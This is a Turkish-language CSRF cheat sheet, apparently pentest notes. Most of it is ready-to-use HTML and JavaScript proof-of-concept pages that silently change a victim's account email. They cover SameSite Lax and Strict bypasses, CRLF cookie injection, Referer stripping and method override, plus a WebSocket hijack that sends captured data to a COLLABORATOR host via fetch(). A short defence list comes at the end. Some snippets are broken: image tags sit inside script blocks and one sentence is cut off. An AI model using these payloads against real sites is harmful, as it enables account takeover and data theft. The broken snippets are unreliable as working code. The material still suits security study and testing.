CSRF Nedir?
Cross-site request forgery (CSRF olarak da bilinir), bir saldırganın kullanıcıları gerçekleştirmek istemedikleri eylemleri gerçekleştirmeye zorlamasına olanak tanıyan bir web güvenlik açığıdır.
Bir saldırganın, farklı web sitelerinin birbirine müdahale etmesini önlemek için tasarlanan “Same Origin Policy ”yi kısmen atlatmasına olanak tanır.
SameSite Cookie Değerleri
SameSite=None: Hiçbir koruma yoktur istek nereden gelirse gelsin cookie isteğe eklenir. Eğer csrf token koruması yoksa saldırı yapılabilir.
SameSite=Lax: Default değerdir. Eğer istek başka bir domainden geliyorsa sadece GET isteklerine çerezi ekler.
SameSite=Strict: Başka domainden gelen hiçbir isteğe çerezi eklemez.
Yöntemler
Korumasız CSRF
Copy <html>
<body>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@gmail.com" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html> GET Metodu ile CSRF
Copy <html>
<body>
<form action="https://example.com/my-account/change-email">
<input type="hidden" name="email" value="attacker@gmail.com" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html> CSRF Token Silme
CSRF Token silindiğinde istek halen kabul ediliyor olabilir.
CSRF Token Session'a Bağlı Olmayabilir
CSRF token eğer bir session'a bağlı değil ise kendi csrf tokenimizi başka kullanıcılarda kullanabiliriz.
CSRF Token Session Dışında Bir Cookie'ye Bağlı Olabilir
Eğer CSRF Token Session çerezi dışında bir çerez ile ilişkili ise bu çerezi kurbanın almasını sağlayabiliriz. Bunun için CRLF (%0d%0a) kullanabiliriz.
Copy <html>
<body>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="csrf" value="CSRF_KEY" />
</form>
<script>
history.pushState('', '', '/');
<img src="https://example.com/?search=test%0d%0aSet-Cookie:%20csrfKey=CSRF_KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">
</script>
</body>
</html> CSRF Token Bir Çerezde Tekrar Ediliyor Olabilir
Eğer CSRF Token bir cookie'de tekrar ediyorsa bu çerezi kurbana aktarabiliriz. Bunun için CRLF (%0d%0a) kullanabiliriz.
Copy <html>
<body>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="csrf" value="CSRF_KEY" />
</form>
<script>
history.pushState('', '', '/');
<img src="https://example.com/?search=test%0d%0aSet-Cookie:%20csrf=CSRF_KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">
</script>
</body>
</html> Sistem kullanıcının kendisinin isteği attığını kontrol etmek için referer başlığını kullanıyor olabilir. Bu korumayı atlatmak için başlığı silmeyi deneyebiliriz.
Copy <html>
<head>
<meta name="referrer" content="no-referrer">
</head>
<body>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@gmail.com" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html> Eğer referer header kontrolünde parser yanlış yapılmış olabilir. Burada url'ye parametre olarak sitenin adresini girdiğimizde korumayı aşmış oluyoruz.
Copy <html>
<head>
<meta name="referrer" content="unsafe-url">
</head>
<body>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@gmail.com" />
</form>
<script>
history.pushState('', '', '/?example.com');
document.forms[0].submit();
</script>
</body>
</html> CSRF Method Override SameSite Lax Bypass
Eğer istek sadece POST metodu ile gönderiliyorsa ve Lax ile cookie işaretlenmiş ise isteği GET yapmamız gerekir. Bunu _method parametresi ile yapmayı deneyebiliriz.
Copy <script>
document.location = "https://example.com/my-account/change-email?email=attacker@gmail.com&_method=POST";
</script> Cookie Yenileyerek SameSite Lax Bypass
Eğer session çerezi lax ile işaretli ise bu çerezi yenileyen sayfaya istek atabiliriz.
Copy <form method="POST" action="https://example.com/my-account/change-email">
<input type="hidden" name="email" value="attacker@gmail.com">
</form>
<script>
window.open('https://example.com/social-login');
setTimeout(changeEmail, 5000);
function changeEmail(){
document.forms[0].submit();
}
</script> Eğer hedefte popup blocker var ise aşağıdaki kodu kullanabiliriz.
Copy <form method="POST" action="https://example.com/my-account/change-email">
<input type="hidden" name="email" value="attacker@gmail.com">
</form>
<p>Click anywhere on the page</p>
<script>
window.onclick = () => {
window.open('https://example.com/social-login');
setTimeout(changeEmail, 5000);
}
function changeEmail() {
document.forms[0].submit();
}
</script> CSRF Open Redirect SameSite Strict Bypass
Eğer session cookie stric
Copy <script>
document.location = "https://example.com/?page=1/../../my-account/change-email?email=attacker@gmail.com%26submit=1";
</script> CSRF Subdomain SameSite Strict Bypass
Eğer session çerezi SameSite Strict ise bu korumayı başka bir domainde xss açığı bularak atlatabiliriz.
Websocket CSRF
Copy <script>
var ws = new WebSocket('wss://example.com');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://COLLABORATOR', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script> Önlemler
CSRF saldırılarına karşı savunmanın en sağlam yolu, ilgili isteklere bir CSRF belirteci eklemektir.
CSRF token yüksek entropi ile tahmin edilemez olmalı.
CSRF token kullanıcının oturumuna bağlı olmalı.
Önemli cookie bilgileri samesite strict ile işaretlenmeli.
Samesite default değer olarak gelen Lax sadece gerekli ise kullanılmalı.
Samesite=None asla kullanılmamalı.
Araçlar
Kaynaklar
